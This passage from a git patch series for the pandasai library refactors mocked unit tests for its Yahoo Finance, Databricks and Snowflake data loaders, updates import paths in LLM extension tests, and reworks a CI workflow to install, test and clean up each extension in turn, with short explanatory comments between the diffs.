-@pytest.fixture
-def cache_interval():
- return 600
-
-
-@pytest.fixture
-def yahoo_finance_connector(stock_ticker, config, cache_interval):
- return YahooFinanceConnector(stock_ticker, config, cache_interval)
-
-
-def test_head(yahoo_finance_connector):
- with patch.object(yf.Ticker, "history") as mock_history:
- mock_history.return_value = pd.DataFrame(
- {
- "Open": [1.0, 2.0, 3.0, 4.0, 5.0],
- "High": [2.0, 3.0, 4.0, 5.0, 6.0],
- "Low": [0.5, 1.5, 2.5, 3.5, 4.5],
- "Close": [1.5, 2.5, 3.5, 4.5, 5.5],
- "Volume": [100, 200, 300, 400, 500],
- }
- )
- expected_result = pd.DataFrame(
+class TestYahooFinanceLoader(unittest.TestCase):
+ @patch("yfinance.Ticker")
+ def test_load_from_yahoo_finance(self, MockTicker):
+ # Setup the mock return value for history method
+ mock_ticker_instance = MagicMock()
+ MockTicker.return_value = mock_ticker_instance
+ mock_ticker_instance.history.return_value = pd.DataFrame(
{
- "Open": [1.0, 2.0, 3.0, 4.0, 5.0],
- "High": [2.0, 3.0, 4.0, 5.0, 6.0],
- "Low": [0.5, 1.5, 2.5, 3.5, 4.5],
- "Close": [1.5, 2.5, 3.5, 4.5, 5.5],
- "Volume": [100, 200, 300, 400, 500],
- }
+ "Date": ["2025-01-01", "2025-01-02"],
+ "Open": [150, 152],
+ "High": [155, 157],
+ "Low": [148, 150],
+ "Close": [153, 155],
+ "Volume": [100000, 120000],
+ },
+ index=pd.to_datetime(["2025-01-01", "2025-01-02"]),
)
- assert yahoo_finance_connector.head().equals(expected_result)
-
-def test_get_cache_path(yahoo_finance_connector):
- with patch("os.path.join") as mock_join:
- expected_result = "../AAPL_data.parquet"
- mock_join.return_value = expected_result
- assert yahoo_finance_connector._get_cache_path() == expected_result
+ # Test data
+ connection_info = {"ticker": "AAPL", "period": "1d"}
+        query = ""  # the query argument is ignored by this loader; an empty string suffices
+ # Call the function under test
+ result = load_from_yahoo_finance(connection_info, query)
-def test_rows_count(yahoo_finance_connector):
- with patch.object(yf.Ticker, "history") as mock_history:
- mock_history.return_value = pd.DataFrame(
- {
- "Open": [1.0, 2.0, 3.0, 4.0, 5.0],
- "High": [2.0, 3.0, 4.0, 5.0, 6.0],
- "Low": [0.5, 1.5, 2.5, 3.5, 4.5],
- "Close": [1.5, 2.5, 3.5, 4.5, 5.5],
- "Volume": [100, 200, 300, 400, 500],
- }
- )
- assert yahoo_finance_connector.rows_count == 5
-
-
-def test_columns_count(yahoo_finance_connector):
- with patch.object(yf.Ticker, "history") as mock_history:
- mock_history.return_value = pd.DataFrame(
- {
- "Open": [1.0, 2.0, 3.0, 4.0, 5.0],
- "High": [2.0, 3.0, 4.0, 5.0, 6.0],
- "Low": [0.5, 1.5, 2.5, 3.5, 4.5],
- "Close": [1.5, 2.5, 3.5, 4.5, 5.5],
- "Volume": [100, 200, 300, 400, 500],
- }
- )
- assert yahoo_finance_connector.columns_count == 5
-
-
-def test_fallback_name(yahoo_finance_connector, stock_ticker):
- assert yahoo_finance_connector.fallback_name == stock_ticker
-
-
-def test_load_from_yahoo_finance_default_period():
- # Arrange
- connection_info = {"ticker": "AAPL"}
- mock_ticker = Mock()
- mock_history = pd.DataFrame({"Close": [100, 101, 102]})
- mock_ticker.history.return_value = mock_history
-
- # Act
- with patch("yfinance.Ticker", return_value=mock_ticker) as mock_yf_ticker:
- result = load_from_yahoo_finance(connection_info, None)
-
- # Assert
- mock_yf_ticker.assert_called_once_with("AAPL")
- mock_ticker.history.assert_called_once_with(period="1mo")
- assert isinstance(result, str)
- assert "Close" in result
- assert "100" in result and "101" in result and "102" in result
-
-
-def test_load_from_yahoo_finance_custom_period():
- # Arrange
- connection_info = {"ticker": "GOOGL", "period": "3mo"}
- mock_ticker = Mock()
- mock_history = pd.DataFrame({"Close": [200, 201, 202]})
- mock_ticker.history.return_value = mock_history
-
- # Act
- with patch("yfinance.Ticker", return_value=mock_ticker) as mock_yf_ticker:
- result = load_from_yahoo_finance(connection_info, None)
+ # Assert that the Ticker method was called with the correct ticker symbol
+ MockTicker.assert_called_once_with("AAPL")
- # Assert
- mock_yf_ticker.assert_called_once_with("GOOGL")
- mock_ticker.history.assert_called_once_with(period="3mo")
- assert isinstance(result, str)
- assert "Close" in result
- assert "200" in result and "201" in result and "202" in result
+ # Assert that the history method was called with the correct period
+ mock_ticker_instance.history.assert_called_once_with(period="1d")
-def test_load_from_yahoo_finance_query_ignored():
- # Arrange
- connection_info = {"ticker": "MSFT"}
- query = "This query should be ignored"
- mock_ticker = Mock()
- mock_history = pd.DataFrame({"Close": [300, 301, 302]})
- mock_ticker.history.return_value = mock_history
+ # Assert the result is a CSV string
+ self.assertTrue(result.startswith(",Date,Open,High,Low,Close,Volume"))
+ self.assertIn("2025-01-01", result)
+ self.assertIn("2025-01-02", result)
- # Act
- with patch("yfinance.Ticker", return_value=mock_ticker) as mock_yf_ticker:
- result = load_from_yahoo_finance(connection_info, query)
- # Assert
- mock_yf_ticker.assert_called_once_with("MSFT")
- mock_ticker.history.assert_called_once_with(period="1mo")
- assert isinstance(result, str)
- assert "Close" in result
- assert "300" in result and "301" in result and "302" in result
+if __name__ == "__main__":
+ unittest.main()
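Why the expected CSV header in the test begins with a comma: the mocked frame carries an unnamed DatetimeIndex, and to_csv(index=True) writes that index as a first, empty-named column. A two-line demonstration:

import pandas as pd

df = pd.DataFrame({"Close": [1.0]}, index=pd.to_datetime(["2025-01-01"]))
print(df.to_csv(index=True).splitlines()[0])  # prints ",Close"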
diff --git a/extensions/ee/connectors/databricks/pandasai_databricks/__init__.py b/extensions/ee/connectors/databricks/pandasai_databricks/__init__.py
index fefeaf3c8..8ad6ee5b3 100644
--- a/extensions/ee/connectors/databricks/pandasai_databricks/__init__.py
+++ b/extensions/ee/connectors/databricks/pandasai_databricks/__init__.py
@@ -1,4 +1,3 @@
-from .databricks import DatabricksConnector
import pandas as pd
from databricks import sql
@@ -48,4 +47,4 @@ def load_from_databricks(config):
connection.close()
-__all__ = ["DatabricksConnector", "load_from_databricks"]
+__all__ = ["load_from_databricks"]
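With the connector class removed, load_from_databricks is the sole entry point; it takes a single config dict, and the SQL statement travels inside it under the "query" key. A hypothetical call with placeholder credentials (key names follow the test config in test_databricks.py):

from pandasai_databricks import load_from_databricks

df = load_from_databricks(
    {
        "host": "my-workspace.cloud.databricks.com",  # placeholder host
        "http_path": "/sql/1.0/warehouses/abc123",  # placeholder warehouse path
        "token": "personal-access-token",
        "query": "SELECT * FROM samples.trips LIMIT 10",
    }
)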
diff --git a/extensions/ee/connectors/databricks/tests/test_databricks.py b/extensions/ee/connectors/databricks/tests/test_databricks.py
index e33f510ee..f8c3ef041 100644
--- a/extensions/ee/connectors/databricks/tests/test_databricks.py
+++ b/extensions/ee/connectors/databricks/tests/test_databricks.py
@@ -1,80 +1,131 @@
import unittest
-from unittest.mock import Mock, patch
+from unittest.mock import patch, MagicMock
+import pandas as pd
+from pandasai_databricks import (
+    load_from_databricks,
+)
+from pandasai_snowflake import load_from_snowflake
-import pandas as pd
-from pandasai_databricks.databricks import (
- DatabricksConnector,
- DatabricksConnectorConfig,
-)
+class TestDatabricksLoader(unittest.TestCase):
+ @patch("databricks.sql.connect")
+ def test_load_from_databricks_with_query(self, MockConnect):
+ # Mock the connection and cursor
+ mock_connection = MagicMock()
+ MockConnect.return_value = mock_connection
+ mock_cursor = MagicMock()
+ mock_connection.cursor.return_value = mock_cursor
+
+ # Sample data that would be returned by Databricks SQL
+ mock_cursor.fetchall.return_value = [
+ (1, "Alice", 100),
+ (2, "Bob", 200),
+ ]
+ mock_cursor.description = [("id",), ("name",), ("value",)]
+ # Test config with a custom SQL query
+ config = {
+ "host": "databricks_host",
+ "http_path": "http_path",
+ "token": "access_token",
+ "query": "SELECT * FROM sample_table",
+        }
+
+        # Exercise the loader; with two mocked rows it should return a
+        # two-row result (assumes the loader builds a DataFrame from
+        # cursor.description / fetchall, per the mocks above).
+        result = load_from_databricks(config)
+        self.assertEqual(len(result), 2)
-class TestDataBricksConnector(unittest.TestCase):
- @patch("pandasai_databricks.databricks.sql")
- def setUp(self, mock_sql):
- # Create mock connection and cursor
- self.mock_cursor = Mock()
- self.mock_connection = Mock()
- self.mock_connection.cursor.return_value = self.mock_cursor
- mock_sql.connect.return_value = self.mock_connection
-
- # Define your ConnectorConfig instance here
- self.config = DatabricksConnectorConfig(
- dialect="databricks",
- host="ehxzojy-ue47135",
- token="token",
- database="DATABRICKS_SAMPLE_DATA",
- http_path="/sql/1.0/warehouses/1241rsa32",
- table="lineitem",
- where=[["column_name", "=", "value"]],
- ).dict()
-
- # Create an instance of DatabricksConnector
- self.connector = DatabricksConnector(self.config)
-
- def test_constructor_and_properties(self):
- self.assertEqual(self.connector.config.model_dump(), self.config)
- self.assertEqual(self.connector._connection, self.mock_connection)
- self.assertEqual(self.connector._cursor, self.mock_cursor)
- self.assertEqual(self.connector._cache_interval, 600)
-
- def test_repr_method(self):
- expected_repr = (
- ""
- )
- self.assertEqual(repr(self.connector), expected_repr)
-
- def test_build_query_method(self):
- # Test _build_query method
- query = self.connector._build_query(limit=5, order="RANDOM()")
- expected_query = """SELECT *
-FROM lineitem
-WHERE column_name = :value_0 ORDER BY RANDOM() ASC
- LIMIT :param_1"""
-
- self.assertEqual(str(query), expected_query)
-
- @patch(
- "pandasai_snowflake.snowflake.pd.read_sql",
- autospec=True,
- )
- def test_head_method(self, mock_read_sql):
- expected_data = pd.DataFrame({"Column1": [1, 2, 3], "Column2": [4, 5, 6]})
- mock_read_sql.return_value = expected_data
- head_data = self.connector.head()
- pd.testing.assert_frame_equal(head_data, expected_data)
-
- def test_rows_count_property(self):
- # Test rows_count property
- self.connector._rows_count = None
- self.mock_connection.execute.return_value.fetchone.return_value = (
- 50,
- ) # Sample rows count
- rows_count = self.connector.rows_count
- self.assertEqual(rows_count, 50)
-
- def test_columns_count_property(self):
- # Test columns_count property
- self.connector._columns_count = None
- mock_df = Mock()
- mock_df.columns = ["Column1", "Column2"]
- self.connector.head = Mock(return_value=mock_df)
- columns_count = self.connector.columns_count
- self.assertEqual(columns_count, 2)
-
- def test_column_hash_property(self):
- # Test column_hash property
- mock_df = Mock()
- mock_df.columns = ["Column1", "Column2"]
- self.connector.head = Mock(return_value=mock_df)
- column_hash = self.connector.column_hash
- self.assertIsNotNone(column_hash)
- self.assertEqual(
- column_hash,
- "ea6a80582b83e1511f8be83412b13e7b86d20c45b96fcf9731f3b99dc3b568aa",
+class TestSnowflakeLoader(unittest.TestCase):
+ @patch("snowflake.connector.connect")
+ @patch("pandas.read_sql")
+ def test_load_from_snowflake_success(self, mock_read_sql, mock_connect):
+ # Mock the connection
+ mock_connection = MagicMock()
+ mock_connect.return_value = mock_connection
+
+ # Sample data returned by the Snowflake query
+ mock_data = [(1, "Alice", 100), (2, "Bob", 200)]
+ mock_read_sql.return_value = pd.DataFrame(
+ mock_data, columns=["id", "name", "value"]
)
- def test_fallback_name_property(self):
- # Test fallback_name property
- fallback_name = self.connector.fallback_name
- self.assertEqual(fallback_name, "lineitem")
-
-
-class TestLoadFromSnowflake(unittest.TestCase):
- @patch("pandasai_snowflake.connector.connect")
- @patch("pandasai_snowflake.pd.read_sql")
- def test_load_from_snowflake(self, mock_read_sql, mock_connect):
- # Mock the connection info
- connection_info = {
- "account": "test_account",
- "user": "test_user",
- "password": "test_password",
- "warehouse": "test_warehouse",
- "database": "test_db",
- "schema": "test_schema",
- "role": "test_role",
+ # Test config for Snowflake connection
+ config = {
+ "account": "snowflake_account",
+ "user": "username",
+ "password": "password",
+ "warehouse": "warehouse_name",
+ "database": "database_name",
+ "schema": "schema_name",
}
+ query = "SELECT * FROM users"
- # Mock the query
- query = "SELECT * FROM test_table"
-
- # Mock the connection
- mock_conn = Mock()
- mock_connect.return_value = mock_conn
-
- # Mock the query result
- expected_df = pd.DataFrame({"col1": [1, 2], "col2": ["a", "b"]})
- mock_read_sql.return_value = expected_df
-
- # Call the function
- result = load_from_snowflake(connection_info, query)
+ # Call the function under test
+ result = load_from_snowflake(config, query)
- # Assert that connect was called with the correct arguments
+ # Assertions
mock_connect.assert_called_once_with(
- account="test_account",
- user="test_user",
- password="test_password",
- warehouse="test_warehouse",
- database="test_db",
- schema="test_schema",
- role="test_role",
+ account="snowflake_account",
+ user="username",
+ password="password",
+ warehouse="warehouse_name",
+ database="database_name",
+ schema="schema_name",
+ role=None,
)
+ mock_read_sql.assert_called_once_with(query, mock_connection)
+ self.assertEqual(result.shape[0], 2) # 2 rows
+ self.assertEqual(result.shape[1], 3) # 3 columns
+ self.assertTrue("id" in result.columns)
+ self.assertTrue("name" in result.columns)
+ self.assertTrue("value" in result.columns)
+
+ @patch("snowflake.connector.connect")
+ @patch("pandas.read_sql")
+ def test_load_from_snowflake_with_optional_role(self, mock_read_sql, mock_connect):
+ # Mock the connection
+ mock_connection = MagicMock()
+ mock_connect.return_value = mock_connection
- # Assert that read_sql was called with the correct arguments
- mock_read_sql.assert_called_once_with(query, mock_conn)
-
- # Assert that the result is the expected DataFrame
- pd.testing.assert_frame_equal(result, expected_df)
+ # Sample data returned by the Snowflake query
+ mock_data = [(1, "Alice", 100), (2, "Bob", 200)]
+ mock_read_sql.return_value = pd.DataFrame(
+ mock_data, columns=["id", "name", "value"]
+ )
- @patch("pandasai_snowflake.connector.connect")
- @patch("pandasai_snowflake.pd.read_sql")
- def test_load_from_snowflake_empty_result(self, mock_read_sql, mock_connect):
- connection_info = {
- "account": "test_account",
- "user": "test_user",
- "password": "test_password",
- "warehouse": "test_warehouse",
- "database": "test_db",
- "schema": "test_schema",
- "role": "test_role",
+ # Test config for Snowflake connection with role
+ config = {
+ "account": "snowflake_account",
+ "user": "username",
+ "password": "password",
+ "warehouse": "warehouse_name",
+ "database": "database_name",
+ "schema": "schema_name",
+ "role": "role_name",
}
+ query = "SELECT * FROM users"
- query = "SELECT * FROM empty_table"
-
- mock_conn = Mock()
- mock_connect.return_value = mock_conn
-
- # Mock an empty DataFrame as the query result
- expected_df = pd.DataFrame()
- mock_read_sql.return_value = expected_df
-
- result = load_from_snowflake(connection_info, query)
+ # Call the function under test
+ result = load_from_snowflake(config, query)
+ # Assertions
mock_connect.assert_called_once_with(
- account="test_account",
- user="test_user",
- password="test_password",
- warehouse="test_warehouse",
- database="test_db",
- schema="test_schema",
- role="test_role",
+ account="snowflake_account",
+ user="username",
+ password="password",
+ warehouse="warehouse_name",
+ database="database_name",
+ schema="schema_name",
+ role="role_name",
)
-
- mock_read_sql.assert_called_once_with(query, mock_conn)
-
- pd.testing.assert_frame_equal(result, expected_df)
-
- @patch("pandasai_snowflake.connector.connect")
- @patch("pandasai_snowflake.pd.read_sql")
- def test_load_from_snowflake_without_optional_params(
- self, mock_read_sql, mock_connect
- ):
- connection_info = {
- "account": "test_account",
- "user": "test_user",
- "password": "test_password",
- "warehouse": "test_warehouse",
- "database": "test_db",
+ mock_read_sql.assert_called_once_with(query, mock_connection)
+ self.assertEqual(result.shape[0], 2)
+ self.assertEqual(result.shape[1], 3)
+ self.assertTrue("id" in result.columns)
+ self.assertTrue("name" in result.columns)
+ self.assertTrue("value" in result.columns)
+
+ @patch("snowflake.connector.connect")
+ @patch("pandas.read_sql")
+ def test_load_from_snowflake_empty_result(self, mock_read_sql, mock_connect):
+ # Mock the connection and cursor
+ mock_connection = MagicMock()
+ mock_connect.return_value = mock_connection
+
+ # Return an empty result set
+ mock_read_sql.return_value = pd.DataFrame(columns=["id", "name", "value"])
+
+ # Test config for Snowflake connection
+ config = {
+ "account": "snowflake_account",
+ "user": "username",
+ "password": "password",
+ "warehouse": "warehouse_name",
+ "database": "database_name",
+ "schema": "schema_name",
}
+ query = "SELECT * FROM empty_table"
- query = "SELECT * FROM test_table"
-
- mock_conn = Mock()
- mock_connect.return_value = mock_conn
+ # Call the function under test
+ result = load_from_snowflake(config, query)
- expected_df = pd.DataFrame({"col1": [1, 2], "col2": ["a", "b"]})
- mock_read_sql.return_value = expected_df
+ # Assertions
+ self.assertTrue(result.empty) # Result should be an empty DataFrame
- result = load_from_snowflake(connection_info, query)
+ @patch("snowflake.connector.connect")
+ def test_load_from_snowflake_missing_params(self, mock_connect):
+ # Test config with missing parameters (account, user, etc.)
+ config = {
+ "warehouse": "warehouse_name",
+ "database": "database_name",
+ "schema": "schema_name",
+ }
+ query = "SELECT * FROM users"
+
+ # Call the function under test and assert that it raises a KeyError
+ with self.assertRaises(KeyError):
+ load_from_snowflake(config, query)
+
+ @patch("snowflake.connector.connect")
+ @patch("pandas.read_sql")
+ def test_load_from_snowflake_invalid_query(self, mock_read_sql, mock_connect):
+ # Mock the connection and cursor
+ mock_connection = MagicMock()
+ mock_connect.return_value = mock_connection
+
+ # Simulate an invalid SQL query
+ mock_read_sql.side_effect = Exception("SQL error")
+
+ # Test config for Snowflake connection
+ config = {
+ "account": "snowflake_account",
+ "user": "username",
+ "password": "password",
+ "warehouse": "warehouse_name",
+ "database": "database_name",
+ "schema": "schema_name",
+ }
+ query = "INVALID SQL QUERY"
- mock_connect.assert_called_once_with(
- account="test_account",
- user="test_user",
- password="test_password",
- warehouse="test_warehouse",
- database="test_db",
- schema=None,
- role=None,
- )
+ # Call the function under test and assert that it raises an Exception
+ with self.assertRaises(Exception):
+ load_from_snowflake(config, query)
- mock_read_sql.assert_called_once_with(query, mock_conn)
- pd.testing.assert_frame_equal(result, expected_df)
+if __name__ == "__main__":
+ unittest.main()
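The Snowflake tests pin down the loader contract precisely: every connection field is required except role, which defaults to None. A sketch consistent with those assertions (the shipped function lives in the pandasai_snowflake extension):

import pandas as pd
import snowflake.connector


def load_from_snowflake(connection_info: dict, query: str) -> pd.DataFrame:
    # Required keys raise KeyError when absent, matching
    # test_load_from_snowflake_missing_params; "role" alone is optional.
    conn = snowflake.connector.connect(
        account=connection_info["account"],
        user=connection_info["user"],
        password=connection_info["password"],
        warehouse=connection_info["warehouse"],
        database=connection_info["database"],
        schema=connection_info["schema"],
        role=connection_info.get("role"),
    )
    return pd.read_sql(query, conn)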
diff --git a/extensions/llms/huggingface/tests/test_huggingface_text_gen.py b/extensions/llms/huggingface/tests/test_huggingface_text_gen.py
index 6e5bb665a..155e3eb8e 100644
--- a/extensions/llms/huggingface/tests/test_huggingface_text_gen.py
+++ b/extensions/llms/huggingface/tests/test_huggingface_text_gen.py
@@ -1,8 +1,9 @@
"""Unit tests for the HuggingFaceTextGen LLM class"""
+
from pandasai_huggingface.huggingface_text_gen import (
HuggingFaceTextGen,
)
-from pandasai.prompts import BasePrompt
+from pandasai.core.prompts.base import BasePrompt
class MockBasePrompt(BasePrompt):
diff --git a/extensions/llms/langchain/tests/test_langchain_llm.py b/extensions/llms/langchain/tests/test_langchain_llm.py
index 3e423a1ef..eefa8a6fb 100644
--- a/extensions/llms/langchain/tests/test_langchain_llm.py
+++ b/extensions/llms/langchain/tests/test_langchain_llm.py
@@ -10,8 +10,9 @@
LLMResult,
)
+from pandasai.llm.base import LLM
from pandasai_langchain.langchain import LangchainLLM
-from pandasai.prompts import BasePrompt
+from pandasai.core.prompts.base import BasePrompt
class TestLangchainLLM:
@@ -71,15 +72,29 @@ def test_agent_integration(self):
from pandasai.agent import Agent
from unittest.mock import MagicMock, PropertyMock
- mock_langchain_llm = MagicMock()
+ class FakeChatOpenAI(LLM):
+ openai_api_key: str = "fake_key"
+
+ @property
+ def type(self) -> str:
+ return "langchain_openai"
+
+ def call(self, prompts, stop=None, run_manager=None, **kwargs):
+ generation = ChatGeneration(
+ message=AIMessage(content="Custom response")
+ )
+ return LLMResult(generations=[[generation]])
+
+ mock_langchain_llm = FakeChatOpenAI()
type_property = PropertyMock(return_value="openai")
type(mock_langchain_llm)._llm_type = type_property
mock_langchain_llm.openai_api_key = "fake_key"
mock_langchain_llm.call = lambda instruction, suffix: "Custom response"
agent = Agent(
- [MagicMock()],
- {"llm": mock_langchain_llm},
+ dfs=[MagicMock()],
+ config={"llm": mock_langchain_llm},
vectorstore=MagicMock(),
)
- assert agent.context.config.llm.type == "langchain_openai"
+ assert agent._state.config.llm.type == "langchain_openai"
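The switch from a bare MagicMock to a concrete FakeChatOpenAI subclass suggests the refactored Agent now validates its llm config field (likely via pydantic), which a plain mock would fail; defining a minimal LLM subclass keeps the integration test type-safe while still returning a canned response.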
diff --git a/extensions/llms/local/tests/test_local_llm.py b/extensions/llms/local/tests/test_local_llm.py
index 4d9ccfcad..d3734d755 100644
--- a/extensions/llms/local/tests/test_local_llm.py
+++ b/extensions/llms/local/tests/test_local_llm.py
@@ -6,7 +6,7 @@
from pandasai.helpers.memory import Memory
from pandasai_local.local_llm import LocalLLM
-from pandasai.prompts import BasePrompt
+from pandasai.core.prompts.base import BasePrompt
@pytest.fixture
diff --git a/extensions/llms/openai/tests/test_openai.py b/extensions/llms/openai/tests/test_openai.py
index e48044179..a37af2db5 100644
--- a/extensions/llms/openai/tests/test_openai.py
+++ b/extensions/llms/openai/tests/test_openai.py
@@ -1,4 +1,5 @@
"""Unit tests for the openai LLM class"""
+
import openai
import pytest
from unittest import mock
@@ -6,7 +7,7 @@
from pandasai.exceptions import APIKeyNotFoundError, UnsupportedModelError
from extensions.llms.openai.pandasai_openai import OpenAI
-from pandasai.prompts import BasePrompt
+from pandasai.core.prompts.base import BasePrompt
class OpenAIObject:
From 466b0791125ae18c7dc3e8fb1384a7a0bea07675 Mon Sep 17 00:00:00 2001
From: ArslanSaleem
Date: Wed, 8 Jan 2025 16:34:56 +0100
Subject: [PATCH 37/58] fix: ci clear cache and suggested improvements
---
.github/workflows/ci.yml | 12 ++++++++++++
extensions/connectors/sql/tests/test_sql.py | 6 +++---
2 files changed, 15 insertions(+), 3 deletions(-)
diff --git a/.github/workflows/ci.yml b/.github/workflows/ci.yml
index 368b8f1c0..f729274a2 100644
--- a/.github/workflows/ci.yml
+++ b/.github/workflows/ci.yml
@@ -20,6 +20,12 @@ jobs:
with:
python-version: ${{ matrix.python-version }}
+ - name: Clean up space before job
+ run: |
+ echo "Cleaning up space"
+ rm -rf /tmp/* # Clear temporary files
+ df -h # Check disk usage
+
- name: Install Poetry (Unix)
if: matrix.os != 'windows-latest'
run: |
@@ -145,3 +151,9 @@ jobs:
flags: unittests
name: codecov-umbrella
fail_ci_if_error: false
+
+ - name: Clean up space after job
+ run: |
+ echo "Cleaning up space after job"
+ rm -rf /tmp/* # Clear temporary files
+ df -h # Check disk usage
diff --git a/extensions/connectors/sql/tests/test_sql.py b/extensions/connectors/sql/tests/test_sql.py
index 0b5e78927..27f1bc92e 100644
--- a/extensions/connectors/sql/tests/test_sql.py
+++ b/extensions/connectors/sql/tests/test_sql.py
@@ -110,10 +110,10 @@ def test_load_from_sqlite(self, mock_read_sql, mock_sqlite3_connect):
@patch("psycopg2.connect")
@patch("pandas.read_sql")
- def test_load_from_cockroachdb(self, mock_read_sql, mock_cockroachdb_connect):
+ def test_load_from_cockroachdb(self, mock_read_sql, mock_postgresql_connect):
# Setup the mock return values
mock_conn = MagicMock()
- mock_cockroachdb_connect.return_value = mock_conn
+ mock_postgresql_connect.return_value = mock_conn
mock_read_sql.return_value = pd.DataFrame(
{"column1": [13, 14], "column2": [15, 16]}
)
@@ -131,7 +131,7 @@ def test_load_from_cockroachdb(self, mock_read_sql, mock_cockroachdb_connect):
result = load_from_cockroachdb(connection_info, query)
# Assert that the connection is made and SQL query is executed
- mock_cockroachdb_connect.assert_called_once_with(
+ mock_postgresql_connect.assert_called_once_with(
host="localhost",
user="root",
password="password",
From 575f852fdb6e344d14c4c3779e87f4f951c6cfd8 Mon Sep 17 00:00:00 2001
From: ArslanSaleem
Date: Wed, 8 Jan 2025 16:37:49 +0100
Subject: [PATCH 38/58] clean up before running CI
---
.github/workflows/ci.yml | 9 +++++----
1 file changed, 5 insertions(+), 4 deletions(-)
diff --git a/.github/workflows/ci.yml b/.github/workflows/ci.yml
index f729274a2..e003e8a6c 100644
--- a/.github/workflows/ci.yml
+++ b/.github/workflows/ci.yml
@@ -23,8 +23,9 @@ jobs:
- name: Clean up space before job
run: |
echo "Cleaning up space"
- rm -rf /tmp/* # Clear temporary files
- df -h # Check disk usage
+ sudo rm -rf /tmp/*
+ sudo rm -rf ~/.cache/pip
+ sudo rm -rf ~/actions-runner/_work/*
- name: Install Poetry (Unix)
if: matrix.os != 'windows-latest'
@@ -155,5 +156,5 @@ jobs:
- name: Clean up space after job
run: |
echo "Cleaning up space after job"
- rm -rf /tmp/* # Clear temporary files
- df -h # Check disk usage
+ sudo rm -rf /tmp/* # Clear temporary files
+ sudo df -h # Check disk usage
From 0c6e5ce697154d50dbd231226e290e58a130ae13 Mon Sep 17 00:00:00 2001
From: ArslanSaleem
Date: Wed, 8 Jan 2025 16:48:17 +0100
Subject: [PATCH 39/58] fix ci pipeline
---
.github/workflows/ci.yml | 134 +++++++++++++++++++++------------------
1 file changed, 71 insertions(+), 63 deletions(-)
diff --git a/.github/workflows/ci.yml b/.github/workflows/ci.yml
index e003e8a6c..40a352962 100644
--- a/.github/workflows/ci.yml
+++ b/.github/workflows/ci.yml
@@ -20,13 +20,6 @@ jobs:
with:
python-version: ${{ matrix.python-version }}
- - name: Clean up space before job
- run: |
- echo "Cleaning up space"
- sudo rm -rf /tmp/*
- sudo rm -rf ~/.cache/pip
- sudo rm -rf ~/actions-runner/_work/*
-
- name: Install Poetry (Unix)
if: matrix.os != 'windows-latest'
run: |
@@ -45,62 +38,83 @@ jobs:
run: pip wheel --use-pep517 "future==0.18.3"
- name: Install dependencies
run: poetry install --all-extras --with dev --verbose
- - name: Install extension dependencies
- if: matrix.os != 'windows-latest'
- run: |
- find extensions/ -mindepth 1 -type d \( \
- -path "extensions/llms/*" -o \
- -path "extensions/connectors/*" -o \
- -path "extensions/ee/*/*" \) | while read -r dir; do
- if [ -f "$dir/pyproject.toml" ]; then
- echo "Installing dependencies for $dir"
- (
- cd "$dir" || exit
- poetry install --all-extras
- )
- fi
- done
- - name: Install extension dependencies (Windows)
- if: matrix.os == 'windows-latest'
- run: |
- # Install LLM extension dependencies
- Get-ChildItem -Path extensions/llms -Directory | ForEach-Object {
- $projFile = Join-Path $_.FullName "pyproject.toml"
- if (Test-Path $projFile) {
- Write-Host "Installing dependencies for $_"
- Push-Location $_.FullName
- poetry install --all-extras
- Pop-Location
- }
- }
-
- # Install connector extension dependencies
- Get-ChildItem -Path extensions/connectors -Directory | ForEach-Object {
- $projFile = Join-Path $_.FullName "pyproject.toml"
- if (Test-Path $projFile) {
- Write-Host "Installing dependencies for $_"
- Push-Location $_.FullName
- poetry install --all-extras
- Pop-Location
- }
- }
-
- # Install enterprise extension dependencies
- Get-ChildItem -Path extensions/ee -Recurse -Directory -Depth 2 | ForEach-Object {
- $projFile = Join-Path $_.FullName "pyproject.toml"
- if (Test-Path $projFile) {
- Write-Host "Installing dependencies for $_"
- Push-Location $_.FullName
- poetry install --all-extras
- Pop-Location
- }
- }
- name: Lint with ruff
run: make format_diff
- name: Spellcheck
run: make spell_check
- name: Run core tests
run: make test_core
+
+ # Install dependencies, test, and remove for each extension
+ - name: Install and test LLM extensions (Unix)
+ if: matrix.os != 'windows-latest'
+ run: |
+ find extensions/llms -mindepth 1 -type d | while read -r dir; do
+ if [ -f "$dir/pyproject.toml" ]; then
+ echo "Installing dependencies for $dir"
+ (
+ cd "$dir" || exit
+ poetry install --all-extras
+ )
+ echo "Running tests for $dir"
+ (
+ cd "$dir" || exit
+ poetry run pytest tests/
+ )
+ echo "Cleaning up dependencies for $dir"
+ (
+ cd "$dir" || exit
+ poetry env remove $(poetry env list --full-path | awk '{print $1}')
+ )
+ fi
+ done
+
+ - name: Install and test Connector extensions (Unix)
+ if: matrix.os != 'windows-latest'
+ run: |
+ find extensions/connectors -mindepth 1 -type d | while read -r dir; do
+ if [ -f "$dir/pyproject.toml" ]; then
+ echo "Installing dependencies for $dir"
+ (
+ cd "$dir" || exit
+ poetry install --all-extras
+ )
+ echo "Running tests for $dir"
+ (
+ cd "$dir" || exit
+ poetry run pytest tests/
+ )
+ echo "Cleaning up dependencies for $dir"
+ (
+ cd "$dir" || exit
+ poetry env remove $(poetry env list --full-path | awk '{print $1}')
+ )
+ fi
+ done
+
+ - name: Install and test Enterprise extensions (Unix)
+ if: matrix.os != 'windows-latest'
+ run: |
+ find extensions/ee -mindepth 1 -type d | while read -r dir; do
+ if [ -f "$dir/pyproject.toml" ]; then
+ echo "Installing dependencies for $dir"
+ (
+ cd "$dir" || exit
+ poetry install --all-extras
+ )
+ echo "Running tests for $dir"
+ (
+ cd "$dir" || exit
+ poetry run pytest tests/
+ )
+ echo "Cleaning up dependencies for $dir"
+ (
+ cd "$dir" || exit
+ poetry env remove $(poetry env list --full-path | awk '{print $1}')
+ )
+ fi
+ done
+
- name: Run extension tests
if: matrix.os != 'windows-latest'
run: make test_extensions
@@ -152,9 +166,3 @@ jobs:
flags: unittests
name: codecov-umbrella
fail_ci_if_error: false
-
- - name: Clean up space after job
- run: |
- echo "Cleaning up space after job"
- sudo rm -rf /tmp/* # Clear temporary files
- sudo df -h # Check disk usage
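
This restructuring replaces the single install-everything pass with three near-identical steps that install, test, and then delete each extension's virtualenv in turn, so disk usage stays bounded instead of accumulating across all extensions. The same install-test-remove cycle, mirrored in Python for clarity (the paths and Poetry invocations follow the workflow; treat this as illustrative, not the project's tooling):

    import subprocess
    from pathlib import Path

    def run_extension_tests(root: str) -> None:
        # For every extension that ships a pyproject.toml: install, test,
        # then remove the virtualenv to reclaim space before the next one.
        for pyproject in sorted(Path(root).rglob("pyproject.toml")):
            ext = pyproject.parent
            subprocess.run(["poetry", "install", "--all-extras"], cwd=ext, check=True)
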